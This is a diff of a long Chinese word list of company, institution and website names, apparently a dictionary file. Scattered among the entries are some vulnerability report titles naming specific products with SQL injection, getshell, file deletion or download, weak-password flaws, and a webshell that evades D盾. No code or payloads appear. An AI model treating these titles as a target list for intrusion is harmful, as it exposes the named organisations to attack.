同力水泥 同和药业 同大股份 @@ -8456,6 +8434,7 @@ zstu 同盾科技 同达创业 名创优品 +名展贸易 名流置业 名站之家 名臣健康 @@ -8489,12 +8468,14 @@ zstu 和远气体 和邦生物 和顺电气 +咕嘟妈咪 咪咕影院 咸阳偏转 品牌商城 哈工智能 哈投股份 哈根速递 +哈森商贸 哈森股份 哈药股份 哈药集团 @@ -8507,6 +8488,7 @@ zstu 唐龙太极 唯美影视 唯美集团 +唯马电机 商业网点 商务中国 商务联盟 @@ -8516,6 +8498,7 @@ zstu 善见教育 喜利商城 喜地商城 +嘀一科技 嘉元科技 嘉兴学院 嘉兴银行 @@ -8652,6 +8635,7 @@ zstu 国青青旅 国风塑业 国骅集团 +图丰信息 圆通速递 土特商城 圣农发展 @@ -8662,6 +8646,7 @@ zstu 圣邦股份 圣阳股份 圣龙股份 +在库言库 地方金融 地暖月刊 地素时尚 @@ -8678,6 +8663,7 @@ zstu 城市快讯 城建发展 城投控股 +域高科技 培训在线 基督真光 基蛋生物 @@ -8691,6 +8677,7 @@ zstu 复旦大学 复星医药 夏新电子 +夏普商贸 夏进乳业 外滩三号 外研在线 @@ -8773,6 +8760,7 @@ zstu 大陆期货 大鹏教育 大龙地产 +天一华宇 天一商城 天一教育 天一科技 @@ -8835,6 +8823,7 @@ zstu 天成自控 天房发展 天晟新材 +天格科技 天桥起重 天歌科技 天歌集团 @@ -8966,6 +8955,7 @@ zstu 威唐工业 威固中国 威孚高科 +威富服饰 威尔科技 威尔药业 威帝股份 @@ -9053,6 +9043,7 @@ zstu 安源煤业 安源股份 安琪酵母 +安瑞维尔 安硕信息 安科生物 安能物流 @@ -9125,6 +9116,7 @@ zstu 宝莫股份 宝藤商城 宝诚股份 +宝贝格子 宝通科技 宝钛股份 宝钢包装 @@ -9132,6 +9124,7 @@ zstu 宝钢集团 宝馨科技 宝马中国 +宝驾出行 宝鸡钛业 宝鹰股份 宝鼎科技 @@ -9176,6 +9169,7 @@ zstu 小商品城 小奥游戏 小康股份 +小明太极 小熊电器 小牛学堂 小牛电动 @@ -9192,6 +9186,7 @@ zstu 尖峰集团 尘际软件 尚品宅配 +尚娱软件 尚德机构 尚水股份 尚游游戏 @@ -9275,6 +9270,7 @@ zstu 川润股份 川煤集团 川环科技 +川耐阀门 川能动力 川财证券 巢东股份 @@ -9321,6 +9317,7 @@ zstu 常山股份 常山药业 常州展览 +常州教育 常林股份 常熟汽饰 常熟银行 @@ -9346,6 +9343,7 @@ zstu 广东榕泰 广东甘化 广东移动 +广东长青 广东骏亚 广东高乐 广东高考 @@ -9466,6 +9464,7 @@ zstu 开创集团 开可蛋糕 开封大学 +开封橡胶 开尔新材 开山股份 开开实业 @@ -9520,7 +9519,9 @@ zstu 微盟集团 微羲科技 微芯生物 +微虎软件 微贷在线 +微量云商 德信影城 德创环保 德力股份 @@ -9670,6 +9671,7 @@ zstu 我们杭州 我武生物 我爱我家 +我要去哪 我赢职场 战旗直播 戴德梁行 @@ -9681,6 +9683,7 @@ zstu 手机大师 手游之家 手游天下 +托克拉克 执着教育 扬中侨网 扬农化工 @@ -9832,6 +9835,7 @@ zstu 新界泵业 新疆交建 新疆众和 +新疆友好 新疆城建 新疆大学 新疆天业 @@ -9846,6 +9850,7 @@ zstu 新联电子 新能泰山 新莱应材 +新蛋科技 新赛股份 新趣头条 新道科技 @@ -9862,6 +9867,7 @@ zstu 方大特钢 方大集团 方太集团 +方家铺子 方正宽带 方正电机 方正科技 @@ -9894,6 +9900,7 @@ zstu 日照一中 日盈电子 日科化学 +日立电梯 日立集团 日辰股份 旭光股份 @@ -9908,6 +9915,7 @@ zstu 时代出版 时代新材 时代科技 +时趣互动 旷达科技 旺能环境 旺龙智能 @@ -9945,6 +9953,7 @@ zstu 易到用车 易名小站 易宝支付 +易家科技 易尚展示 易居中国 易恩电气 @@ -9961,6 +9970,7 @@ zstu 易速科技 易鑫车贷 易食股份 +昕薇在线 星云股份 星光农机 星外转铺 @@ -10030,6 +10040,7 @@ zstu 晶澳科技 晶瑞股份 晶盛机电 +晶科绿能 智云股份 智信创富 智光电气 @@ -10039,6 +10050,7 @@ zstu 智度股份 智慧交大 智慧农业 +智慧平台 智慧松德 智慧树网 智慧职教 @@ -10059,6 +10071,7 @@ zstu 曲美家居 曹操出行 最佳东方 +月旭科技 有个理财 有友食品 有商机网 @@ -10117,6 +10130,7 @@ zstu 杰瑞股份 杰瑞集团 杰赛科技 +松冈科技 松发股份 松炀资源 松芝股份 @@ -10229,6 +10243,7 @@ zstu 正奇金融 正川股份 正平股份 +正新橡胶 正泰电器 正泰集团 正海生物 @@ -10254,6 +10269,8 @@ zstu 武汉学院 武汉广电 武汉控股 +武汉英中 +武汉钢铁 武警学院 武进不锈 武钢集团 @@ -10456,6 +10473,7 @@ zstu 泉州银行 泉舜集团 法兰泰克 +法务之家 法宣在线 法律之星 法拉电子 @@ -10511,10 +10529,13 @@ zstu 洪都航空 洲明科技 洲际油气 +活跃网络 洽洽食品 +派博在线 派思股份 派桑网络 派生科技 +济南四建 济南大学 济南社区 济南钢铁 @@ -10656,6 +10677,7 @@ zstu 海航科技 海航集团 海虹控股 +海虾企业 海螺型材 海螺水泥 海螺集团 @@ -10731,6 +10753,7 @@ zstu 清廉德阳 清廉镇江 清新环境 +清源科技 清源股份 清溢光电 清科集团 @@ -10823,6 +10846,7 @@ zstu 潭州教育 潭州课堂 潮光科技 +潮州三环 澄天伟业 澄星股份 澜起科技 @@ -10830,6 +10854,7 @@ zstu 澳洋顺昌 澳门电讯 澳门航空 +激声博韵 激智科技 濮耐股份 濮阳惠成 @@ -10845,6 +10870,7 @@ zstu 灵康药业 灵感日报 灵隆科技 +炎黄东方 炬华科技 点掌传媒 点点搜财 @@ -10888,6 +10914,7 @@ zstu 爱建集团 爱德纲网 爱心人寿 +爱思集团 爱普股份 爱朋医疗 爱豆网络 @@ -10916,6 +10943,7 @@ zstu 环球印务 环迅支付 现代制药 +现代威亚 现代投资 玲珑轮胎 珂兰商贸 @@ -10940,6 +10968,7 @@ zstu 瑞凌股份 瑞友天翼 瑞和股份 +瑞幸咖啡 瑞康医药 瑞斯康达 瑞普生物 @@ -11072,6 +11101,7 @@ zstu 盛达资源 盛运环保 盛通股份 +盟拓软件 直销同城 盾安环境 省广集团 @@ -11245,6 +11275,7 @@ zstu 第一铅笔 第一食品 第五大道 +第四范式 筑博设计 简单任务 简单心理 @@ -11350,6 +11381,7 @@ zstu 绿谷集团 绿软盒子 编程论坛 +缤刻普锐 网上车市 网信集团 网宿科技 @@ -11487,6 +11519,7 @@ zstu 能科科技 能科股份 腕表之家 +腕表时代 腾信股份 腾达建设 腾邦国际 @@ -11539,6 +11572,7 @@ zstu 节能风电 芊芊影院 芒果超媒 +芭乐互动 芭田股份 芯能科技 花园生物 @@ -11631,6 +11665,7 @@ zstu 蓝信移动 蓝光发展 蓝天商城 +蓝天电脑 蓝帆医疗 蓝思科技 蓝星新材 @@ -11735,6 +11770,7 @@ zstu 誉衡药业 许昌学院 许继电气 +论客科技 设计总院 证券软件 证通电子 @@ -11755,6 +11791,7 @@ zstu 诺康生物 诺德投资 诺德股份 +诺心食品 诺禾致源 诺达教育 诺邦股份 @@ -11799,6 +11836,7 @@ zstu 贵阳银行 赛为智能 赛升药业 +赛尔互联 赛意信息 赛托生物 赛摩电气 @@ -11879,6 +11917,7 @@ zstu 达实智能 达志科技 达美国际 +达飞轮船 迅游科技 迈为股份 迈克生物 @@ -11969,8 +12008,10 @@ zstu 鄂州公安 鄂武商A 鄞州银行 +酒泉钢铁 酒钢宏兴 酒钢集团 +酷味阳光 酷我听书 酷我音乐 酷狗音乐 @@ -11998,6 +12039,7 @@ zstu 金亚科技 金健米业 金光集团 +金农信达 金冠股份 金刚玻璃 金利华电 @@ -12067,6 +12109,7 @@ zstu 金程网校 金能科技 金自天正 +金花企业 金花股份 金蝶软件 金证股份 @@ -12112,6 +12155,7 @@ zstu 铁岭新城 铁汉生态 铁流股份 +铁血君客 铁龙物流 铂涛集团 铜仁学院 @@ -12152,10 +12196,12 @@ zstu 银鸽集团 银龙股份 链家地产 +锋镝传媒 锋龙股份 锌业股份 锐奇控股 锐奇股份 +锐明技术 锐狐网络 锐珂医疗 锐科激光 @@ -12293,7 +12339,10 @@ zstu 雄韬股份 雅克科技 雅化集团 +雅培贸易 +雅座在线 雅思预测 +雅昌文化 雅本化学 雅莹集团 雅诗兰黛 @@ -12345,6 +12394,7 @@ zstu 青海春天 青海银行 青蛙王子 +青青优农 青青稞酒 青鸟华光 青鸟天桥 @@ -12552,6 +12602,7 @@ zstu 齐心集团 齐翔腾达 齐聚科技 +齐鲁证券 齐鲁软件 齐鲁银行 龍記集團 @@ -12586,164 +12637,15 @@ zstu 龙软科技 龙门教育 龙韵股份 +龙飞凤舞 龙马环卫 -常州教育 -我要去哪 (517旅行网) 泛普软件 - SQL注入漏洞 智联科技 IQLink 复兰科技 K6KT-快乐课堂 雷风影视 V3.1 任意文件删除 开心一刻 笑话集 +长沙房产 有限公司 华龙艾迪 取证平台 一处SQL注入 -企查查( 苏州朗动网络科技有限公司) -长沙房产( 集团) 有限公司 -前程无忧(51job) -前程无忧(51job.com) -锐明技术(AI-共建更安全 -法兰琳卡(FRANIC)官方网站 -上工申贝(集团) -上海丰华(集团) -上海海立(集团) -上海龙头(集团) -中化国际(控股) -信用中国(佛山) -信用中国(汕头) -信用中国(汕尾) -信用中国(贵州) -信用中国(辽宁) -信用中国(陕西) -八方电气(苏州) -兰州民百(集团) -兴民智通(集团) -力合科技(湖南) -力帆实业(集团) -华映科技(集团) -吉林亚泰(集团) -哈森商贸(中国) -四川金顶(集团) -大众交通(集团) -大连友谊(集团) -天顺风能(苏州) -广东长青(集团) -恒为科技(上海) -新疆友好(集团) -欣龙控股(集团) -海南椰岛(集团) -海默科技(集团) -淮河能源(集团) -清源科技(厦门) -潮州三环(集团) -福安药业(集团) -聚光科技(杭州) -胜宏科技(惠州) -诚迈科技(南京) -金花企业(集团) -长春经开(集团) -阳泉煤业(集团) -鹏鼎控股(深圳) -中国振华(集团)科技 -中福海峡(平潭)发展 -蓝英通华(北京)技术 -量子高科(中国)生物 -麦克奥迪(厦门)电气 -上海连成(集团)有限公司 -中国动向(集团)有限公司 -中国重汽(香港)有限公司 -华硕电脑(上海)有限公司 -名门地产(河南)有限公司 -和冠科技(北京)有限公司 -宏碁电脑(上海)有限公司 -宝沃汽车(中国)有限公司 -广发控股(香港)廣發地產 -康龙化成(北京)新药技术 -快尚时装(广州)有限公司 -欣强电子(清远)有限公司 -满记甜品(上海)有限公司 -神钢建机(中国)有限公司 -腾讯科技(深圳)有限公司 -诺心食品(上海)有限公司 -鬼工科技(北京)有限公司 -上工申贝(集团)股份有限公司 -上海丰华(集团)股份有限公司 -上海海立(集团)股份有限公司 -上海龙头(集团)股份有限公司 -东方锅炉(集团)股份有限公司 -中化国际(控股)股份有限公司 -中票在线(北京)票务有限公司 -亚世光电(集团)股份有限公司 -八方电气(苏州)股份有限公司 -兰州民百(集团)股份有限公司 -兴民智通(集团)股份有限公司 -力合科技(湖南)股份有限公司 -力帆实业(集团)股份有限公司 -力帆科技(集团)股份有限公司 -华奥星空(北京)信息技术公司 -华映科技(集团)股份有限公司 -吉林亚泰(集团)股份有限公司 -哈森商贸(中国)股份有限公司 -四川金顶(集团)股份有限公司 -国家食品(产品)安全追溯平台 -在线途游(北京)科技有限公司 -大众交通(集团)股份有限公司 -大富科技(安徽)股份有限公司 -大连友谊(集团)股份有限公司 -天顺风能(苏州)股份有限公司 -奥普电器(中国)股份有限公司 -孚能科技(赣州)股份有限公司 -宁波水表(集团)股份有限公司 -宸展光电(厦门)股份有限公司 -广东舜喆(集团)股份有限公司 -广东长青(集团)股份有限公司 -广西贵糖(集团)股份有限公司 -康平科技(苏州)股份有限公司 -建科机械(天津)股份有限公司 -恒为科技(上海)股份有限公司 -恒玄科技(上海)股份有限公司 -新疆友好(集团)股份有限公司 -樱花卫厨(中国)股份有限公司 -欣龙控股(集团)股份有限公司 -海南椰岛(集团)股份有限公司 -海虹企业(控股)股份有限公司 -海默科技(集团)股份有限公司 -淮河能源(集团)股份有限公司 -清源科技(厦门)股份有限公司 -潮州三环(集团)股份有限公司 -福安药业(集团)股份有限公司 -统一企业(中国)投资有限公司 -聚众网通(北京)科技有限公司 -聚光科技(杭州)股份有限公司 -胜宏科技(惠州)股份有限公司 -芯海科技(深圳)股份有限公司 -英才网联(北京)咨询有限公司 -诚迈科技(南京)股份有限公司 -酒泉钢铁(集团)有限责任公司 -金花企业(集团)股份有限公司 -长春经开(集团)股份有限公司 -阳泉煤业(集团)股份有限公司 -鹏鼎控股(深圳)股份有限公司 -世纪闻康(北京)科技发展有限公司 -中农网购(江苏)电子商务有限公司 -中国振华(集团)科技股份有限公司 -中福海峡(平潭)发展股份有限公司 -优客逸家(成都)信息科技有限公司 -创业黑马(北京)科技股份有限公司 -固高派动(东莞)智能科技有限公司 -安瑞维尔(北京)信息技术有限公司 -掌合天下(北京)信息技术有限公司 -泽达易盛(天津)科技股份有限公司 -量子高科(中国)生物股份有限公司 -麦克奥迪(厦门)电气股份有限公司 -二重集团(德阳)重型装备股份有限公司 -康龙化成(北京)新药技术股份有限公司 -爱博诺德(北京)医疗科技股份有限公司 -速伯艾特(北京)国际酒店管理有限公司 -信用中国(山东邹城) -信用中国(河北唐县) -信用中国(湖北武汉) -信用中国(河北博野县) -现代威亚(原现代起亚) -信用中国(内蒙古呼和浩特) -上海丰华(集团)股份有限公司 思科题库,微软题库,华为题库,红帽题库 中国通州--南通市通州区人民政府网站 合阔智云-Hex Cloud @@ -12762,7 +12664,6 @@ zstu 衡水纪检-中共衡水市纪委官方网站 号码之家-上海挑卡网络科技有限公司 四创软件-山洪灾害预警监测系统信息泄露及任意文件上传 -蓝天电脑/百脑汇 湘潭大学01 常宁市“12345”政府服务热线 国家质检12365投诉举报咨询网 @@ -12774,8 +12675,8 @@ zstu 香港资信800有限公司 上谷网络ASPCMS 重庆大学A区 -宏天软件BPMX3一处越权操作所有用户信息(demo测试) -宏天软件BPMX5一处越权操作所有用户信息,可获取所有用户信息(demo复现) +宏天软件BPMX3一处越权操作所有用户信息 +宏天软件BPMX5一处越权操作所有用户信息,可获取所有用户信息 中国知网CAJViewer驱动池溢出漏洞可提权获得系统SYSTEM权限 雷风影视CMS V3.1 SQL注入 雷风影视CMS V3.1一处getshell @@ -12795,23 +12696,23 @@ zstu 原创手工DIY创意分享平台 全程软件DRP进销存系统存在SQL注入漏洞 一句话过D盾 -正航软件EIP企业信息门户/T8企业信息门户存在通用型SQL注入漏洞 +正航软件EIP企业信息门户 上海永达ERP核销管理平台 杭州云天ERP系统代码执行漏洞打包#2 志华软件F22服装管理软件存在通用型SQL注入 政采系统GETSHELL 华文信通HAMS-8.0 - 任意文件下载 -全程软件HR系统 - 任意文件下载(demo演示) +全程软件HR系统 - 任意文件下载 深圳科图ILAS图书馆自动化集成系统存在通用型oracle注入漏洞 中国电信MISAS_Lab 澳大利亚MOX集团 上海宝欧MRO 梅斯医学MedSci-临床医生发展平台 智明协同OA 一處getshell -鹏威协同OA(官方演示站)上传漏洞导致getshell -全程软件OA协同办公 - Getshell(demo演示) -全程软件OA协同办公 - XSS漏洞(demo演示) -全程软件OA协同办公 - 越权漏洞(demo演示) +全程软件OA协同办公 - Getshell +全程软件OA协同办公 - XSS漏洞 +全程软件OA协同办公 - 越权漏洞 +鹏威协同OA上传漏洞导致getshell 智雄软件OA办公系统五处sql注入打包 众联财富P2P 中软国际ResourceOne Framework管理员登录 @@ -12840,9 +12741,6 @@ zstu 首师大,cnu 东风柳汽dms系统 云天软件erp管理系统存在sql注入漏洞 -河工大(hebut) -哈工程(heu) -内科大(imust) 中国大学mooc 中科曙光sugon 上外贸,suibe @@ -12895,6 +12793,7 @@ zstu 上海拍拍贷 上海数据港 上海新世界 +上海杏花楼 上海来伊份 上海柴油机 上海气象局 @@ -12917,6 +12816,7 @@ zstu 世界工厂网 世纪农药网 世纪淘商城 +东方信天翁 东方女性网 东方工业园 东方融资网 @@ -12971,6 +12871,7 @@ zstu 中国供应商 中国信通院 中国信鸽网 +中国全聚德 中国兽医网 中国农药网 中国农资网 @@ -13075,6 +12976,7 @@ zstu 中成进出口 中文听书网 中昌大数据 +中港通集团 中港通集團 中演票务通 中电科能源 @@ -13106,6 +13008,7 @@ zstu 丹阳人才网 丹阳房管处 丹阳物流网 +举贤网科技 义乌人才网 之江教育云 乐享阅读网 @@ -13165,6 +13068,8 @@ zstu 众业达电气 众加商贸网 众悦学车网 +优利德科技 +优定制科技 会支付商城 伤感云音乐 余易贷网站 @@ -13321,6 +13226,7 @@ zstu 厨卫招商网 友情手机站 双胞胎集团 +口腔医学网 古浪廉政网 句容先锋网 台州人才网 @@ -13407,6 +13313,7 @@ zstu 图闻天下网 土巴兔装修 圣才学习网 +圣邦微电子 在线听书网 地暖月刊网 地质出版社 @@ -13451,6 +13358,7 @@ zstu 天星教育网 天水生活网 天津农学院 +天津劝业场 天津民政局 天津消防网 天涯法律网 @@ -13540,10 +13448,12 @@ zstu 宝应文明办 宝盒子科技 宝葫芦集团 +宝视达眼镜 宝贝婚团网 宝鸡交警网 宝鸡人才网 宝鸡新闻网 +客如云科技 宣城共青团 家乐园速购 家乐园集团 @@ -13557,6 +13467,7 @@ zstu 宿迁党建网 富士康科技 富森美家居 +富泰华工业 富阳人才网 寒门状元网 将乐县纪委 @@ -13578,6 +13489,7 @@ zstu 山东金麒麟 山东钢铁网 山东驾培网 +山崎马扎克 山西人才网 山西青年报 岐山县政协 @@ -13604,6 +13516,7 @@ zstu 常州工学院 常州招聘网 常德房产网 +常春藤教育 干燥设备网 平乡党建网 平利政法网 @@ -13791,7 +13704,9 @@ zstu 明源云科技 明源云集团 易事特集团 +易图通科技 易方达基金 +易联众民生 昕薇网网站 星启天网络 星岛头条网 @@ -13803,6 +13718,7 @@ zstu 普中职教网 普灵仕集团 晴雨美文网 +晶晨半导体 智慧中阳里 智慧西陵网 智成人才网 @@ -13942,6 +13858,7 @@ zstu 河南教育厅 河南教育网 河南法学网 +河南省煤气 河南福彩网 河南舞钢市 河源市政府 @@ -14017,7 +13934,12 @@ zstu 深圳华侨城 深圳大剧院 深圳市兆驰 +深圳市天健 +深圳市天地 +深圳市振业 深圳市机场 +深圳市特力 +深圳市纺织 深圳瑞银信 深圳音乐厅 淳安房产网 @@ -14109,6 +14031,7 @@ zstu 爱彩乐平台 爱德基金会 爱慕鲜花网 +爱迪尔集团 猎才医药网 獐子岛集团 王府井集团 @@ -14158,6 +14081,7 @@ zstu 皖南医学院 皮带秤厂家 盈方微电子 +盈融达投资 益阳市政府 盐城双拥网 盐山党建网 @@ -14211,6 +14135,7 @@ zstu 简单学习网 米乐分销网 米其林轮胎 +米哈游科技 粤电商务网 粤语学习网 精品学习网 @@ -14303,6 +14228,7 @@ zstu 英语技巧网 英语教师网 英语阅读网 +英飞特电子 苹果教育网 苹果直播网 茂名房产网 @@ -14330,6 +14256,7 @@ zstu 蔬菜商情网 虎扑体育网 蚌埠医学院 +蜜米柏克思 衡水人才网 衡水市政府 衡阳广电网 @@ -14341,6 +14268,7 @@ zstu 西北人才网 西和县政府 西坡纪念馆 +西域供应链 西宁市人大 西宁特殊钢 西安公交网 @@ -14569,6 +14497,7 @@ zstu 鹤岗汽车网 鹰潭环保局 麒麟党建网 +麦可思数据 麦积法院网 麦趣尔集团 黄冈教育云 @@ -14589,36 +14518,6 @@ zstu 龙岩人才网 龙观人才网 环球艺术汇 广州市圣佳宜文化传播有限公司 -珠海气象局(台) -中国全聚德(集团) -圣邦微电子(北京) -天津劝业场(集团) -晶晨半导体(上海) -深圳市天健(集团) -深圳市天地(集团) -深圳市振业(集团) -深圳市特力(集团) -深圳市纺织(集团) -英飞特电子(杭州) -杭州高新区(滨江)门户网站 -艾百思科技(北京)有限公司 -达芙妮投资(集团)有限公司 -中国全聚德(集团)股份有限公司 -优利德科技(中国)股份有限公司 -保利房地产(集团)股份有限公司 -内蒙古电力(集团)有限责任公司 -圣邦微电子(北京)股份有限公司 -天津劝业场(集团)股份有限公司 -晶晨半导体(上海)股份有限公司 -深圳市天健(集团)股份有限公司 -深圳市天地(集团)股份有限公司 -深圳市振业(集团)股份有限公司 -深圳市特力(集团)股份有限公司 -深圳市纺织(集团)股份有限公司 -芯原微电子(上海)股份有限公司 -英飞特电子(杭州)股份有限公司 -海口农工贸(罗牛山)股份有限公司 -口腔医学网(江苏爱齿网络科技有限公司) 海南互联网+防灾减灾综合信息平台 欧洲旅游团,欧洲旅行社 宿迁人社局,宿迁人才中心 @@ -14634,14 +14533,12 @@ zstu 中国科学院EDA中心 北京老男孩IT教育 北大侠客行MUD -某通用系统SQL注入漏洞(无需登录) +某通用系统SQL注入漏洞 快商通存储XSS 问卷星通用XSS 湖南婚纱照_湖南婚纱摄影-长沙【波西米亚】婚纱摄影工作室官方网站 -某硬件系统getshell(无需登录) +某硬件系统getshell 荆州共青团phpsso_server存在弱口令 -三星集团(samsung) -内江甜橙网|内江网络广播电视台 鄂托克先锋·智慧党建 ​国家邮政局 一朵朵鲜花网 @@ -14649,6 +14546,7 @@ zstu 一点通学习网 一点通教学网 一诺网络科技 +万全控股集团 万兴科技集团 万华化学集团 万安县人大网 @@ -14673,19 +14571,24 @@ zstu 上海一美整形 上海七宝中学 上海万业企业 +上海三毛企业 上海中兴通讯 上海临港控股 上海亚虹模具 上海交大昂立 上海交运集团 上海交通大学 +上海交通投资 上海仁爱医院 上海会畅通讯 上海体育学院 +上海信息产业 上海健康学院 上海光华中学 上海公安学院 +上海凤凰企业 上海凯宝药业 +上海凯泉泵业 上海创力集团 上海剑桥科技 上海北特科技 @@ -14698,9 +14601,11 @@ zstu 上海吉祥航空 上海国家电网 上海国际机场 +上海国际港务 上海城地建设 上海城投控股 上海复旦大学 +上海复星医药 上海大学附中 上海大屯能源 上海大承网络 @@ -14728,6 +14633,7 @@ zstu 上海市统计局 上海市规土局 上海师范大学 +上海广电电气 上海建工集团 上海建桥学院 上海开开实业 @@ -14739,6 +14645,7 @@ zstu 上海快捷快递 上海戏剧学院 上海报业集团 +上海振华重工 上海摩恩电气 上海政法大学 上海政法学院 @@ -14860,6 +14767,7 @@ zstu 丝路视觉科技 丞燕国际机构 中体产业集团 +中体未来投资 中信出版集团 中信国安集团 中信建投证券 @@ -14936,12 +14844,14 @@ zstu 中国宝安集团 中国山亭网站 中国工商银行 +中国平安保险 中国广核电力 中国建筑一局 中国建筑书店 中国建筑学会 中国建设银行 中国戏曲学院 +中国振华科技 中国攀枝花网 中国政府网站 中国政法大学 @@ -15032,6 +14942,7 @@ zstu 中山市财政局 中工国际工程 中广天择传媒 +中建新疆建工 中建环能科技 中建西部建设 中捷资源投资 @@ -15046,10 +14957,13 @@ zstu 中百控股集团 中盛光电集团 中矿资源集团 +中福海峡发展 中科创达软件 +中科实业集团 中科院网站群 中策橡胶集团 中粮屯河糖业 +中粮生物化学 中粮生物科技 中粮资本控股 中航光电科技 @@ -15058,6 +14972,7 @@ zstu 中节能太阳能 中街智慧商圈 中衡设计集团 +中装新网科技 中设设计集团 中谷粮油集团 中贝通信集团 @@ -15106,13 +15021,16 @@ zstu 乐山企业在线 乐山市人大网 乐山市公安局 +乐普医疗器械 乐清市教育局 +乐鑫信息科技 乔丹体育官网 九五网吧大师 九华山管委会 九号有限公司 九次方大数据 乳山市长安网 +云丁网络技术 云南云投集团 云南农业大学 云南城投置业 @@ -15143,13 +15061,17 @@ zstu 云南警官学校 云南财经大学 云南驰宏锌锗 +云智易控科技 云贝饰品批发 五莲县信用办 亚光科技集团 +亚士创能科技 亚宝药业集团 亚数信息科技 亚普汽车部件 交通运输行业 +京信通信系统 +亮讯国际贸易 亳州市气象局 亳州市科技局 人文与社会网 @@ -15169,12 +15091,16 @@ zstu 任丘市党建网 任县人民政府 伊宁市政府网 +伊春市农产品 伊犁师范学院 众信旅游集团 众应互联科技 +优德精密工业 优朋普乐科技 会东县水务局 会稽山绍兴酒 +传奇科软科技 +传驰网络技术 住友酒店集团 佛山市公安局 佛山市图书馆 @@ -15252,6 +15178,7 @@ zstu 内蒙古财政厅 内蒙古赤峰市 再生邦资源网 +冠捷科技集团 冠昊生物科技 冰轮环境技术 决胜教育集团 @@ -15270,6 +15197,7 @@ zstu 利酷搜黄页网 加加食品集团 动感蚂蚁健身 +势场信息科技 包头华资实业 包头明天科技 包银消费金融 @@ -15305,6 +15233,7 @@ zstu 北京吉利学院 北京和信创天 北京四中网校 +北京城乡商业 北京城市学院 北京城建集团 北京夜猫网络 @@ -15362,6 +15291,7 @@ zstu 北京翠微大厦 北京考试书店 北京耐威科技 +北京联东投资 北京联合大学 北京舞蹈学院 北京航天长峰 @@ -15379,6 +15309,7 @@ zstu 北京韩美药品 北京顺鑫农业 北京首商集团 +北京首旅酒店 北京首汽集团 北京首都开发 北京首都机场 @@ -15428,6 +15359,7 @@ zstu 华工科技产业 华平信息技术 华强化工集团 +华拓光研科技 华数传媒控股 华明电力装备 华泰保险集团 @@ -15437,6 +15369,7 @@ zstu 华电国际电力 华电集团公司 华能国际电力 +华菱星马汽车 华融湘江银行 华西第四医院 华西能源工业 @@ -15444,15 +15377,18 @@ zstu 华谊兄弟传媒 华谊兄弟影院 华谊嘉信集团 +华辰精密装备 华达汽车科技 华邦生命健康 华铁传媒集团 +华锐风电科技 华龙区财政局 协鑫能源科技 协鑫集成科技 卓尔智联集团 卓越教育集团 卓郎智能技术 +南京中央商场 南京体育学院 南京儿童医院 南京公交集团 @@ -15489,6 +15425,7 @@ zstu 南京熊猫电子 南京理工大学 南京聚隆科技 +南京脑科医院 南京艺术学院 南京药石科技 南京财经大学 @@ -15547,6 +15484,9 @@ zstu 博天环境集团 博思人力集团 博琅科技官网 +博瑞生物医药 +博西家用电器 +博通集成电路 卢氏县财政局 卧龙地产集团 卫辉市地矿局 @@ -15580,7 +15520,9 @@ zstu 厦门金牌厨柜 厦门银鹭公司 厦门高崎机场 +友讯电子设备 双良节能系统 +可口可乐饮料 可可网络科技 台山市教育局 台州市司法局 @@ -15637,10 +15579,12 @@ zstu 咸阳市教育局 咸阳市财政局 咸阳师范学院 +品鑫泰供应链 哇棒移动传媒 哈尔滨商务局 哈尔滨地铁网 哈尔滨市政府 +哈尔滨高科技 哔哩哔哩唧唧 唐县人民政府 唐山三友化工 @@ -15659,6 +15603,7 @@ zstu 嘉兴市统计局 嘉友国际物流 嘉祥教育集团 +嘉美食品包装 四季教育官网 四季青服装网 四川九洲电器 @@ -15738,6 +15683,8 @@ zstu 国立空中大学 国美控股集团 国美通讯设备 +国肽生物科技 +国药堂大药房 国药集团药业 国防科技大学 图行天下网站 @@ -15751,6 +15698,7 @@ zstu 城市地区查询 培黎职业学院 基蛋生物科技 +堆糖信息科技 夏那一舞资源 夜色宝贝商城 大上海人才网 @@ -15778,6 +15726,7 @@ zstu 大学生自学网 大庆市建设局 大庆市总工会 +大彻网络科技 大悟县财政局 大智教育集团 大石桥市政府 @@ -15808,8 +15757,10 @@ zstu 天圣制药集团 天地华宇物流 天域生态环境 +天天利财科技 天安保险超市 天意快印官网 +天根生化科技 天水华天科技 天水师范学院 天泽信息产业 @@ -15868,8 +15819,10 @@ zstu 太平洋电脑网 太极养生医馆 太极生活公社 +太龙商业照明 奥美医疗用品 奥马电商平台 +好吃佬美食网 如东市科技局 如家酒店集团 威县人民政府 @@ -15961,6 +15914,7 @@ zstu 安徽江南化工 安徽海螺水泥 安徽皖通科技 +安徽盛运环保 安徽省人才网 安徽省住建厅 安徽省体育局 @@ -15996,6 +15950,7 @@ zstu 安正时尚集团 安源煤业集团 安溪县教育局 +安琪电子商务 安福县政府网 安联保险集团 安道麦安道麦 @@ -16019,6 +15974,7 @@ zstu 宜兴市卫生局 宜华健康医疗 宜华生活科技 +宜家电子商务 宜宾天原集团 宜宾市图书馆 宜昌公交集团 @@ -16242,6 +16198,7 @@ zstu 广东榕泰实业 广东正业科技 广东水电二局 +广东海印永业 广东海印集团 广东海大集团 广东海洋大学 @@ -16469,6 +16426,7 @@ zstu 抚顺市民政局 抚顺市气象局 拉比企业官网 +拉萨市商务局 拍立享云摄影 拓维信息系统 招商港口招港 @@ -16477,6 +16435,7 @@ zstu 揭阳市建设局 揭阳市房管局 收藏人民币网 +敏华家具制造 数字展示在线 数源科技股份 文一三佳科技 @@ -16515,6 +16474,7 @@ zstu 新疆艺术学院 新疆西部牧业 新疆金风科技 +新疆雪峰科技 新蔡县农牧局 新豪轩商学院 新速特软件站 @@ -16636,6 +16596,7 @@ zstu 杭州集智机电 杭州顺网科技 杭州黄龙饭店 +杰特电子实业 松原市教育局 松德智慧装备 松松共享云仓 @@ -17251,6 +17212,7 @@ zstu 深圳市全新好 深圳市公安局 深圳市安奈儿 +深圳市康达尔 深圳市教育局 深圳市新国都 深圳市水务局 @@ -17413,6 +17375,7 @@ zstu 溧水区教育局 溧阳市教育局 滁州市科技局 +滋源官方网站 滑县人民政府 滕州市教育局 滨州市商务局 @@ -17461,6 +17424,7 @@ zstu 物产中大集团 特一药业集团 特步官方商城 +特步有限公司 猎豹汽车官网 献县人民政府 玉林师范学院 @@ -17469,6 +17433,8 @@ zstu 玉溪师范学院 环亚保险经纪 环球互易集团 +环球时报在线 +环胜电子商务 现代管理大学 珀莱雅化妆品 珍珠美人官网 @@ -17496,7 +17462,10 @@ zstu 瑞辉钟表集团 甘山森林公园 甘肃上峰水泥 +甘肃亚盛实业 甘肃农业大学 +甘肃刚泰控股 +甘肃国芳工贸 甘肃政法大学 甘肃皇台酒业 甘肃省公安厅 @@ -17509,12 +17478,14 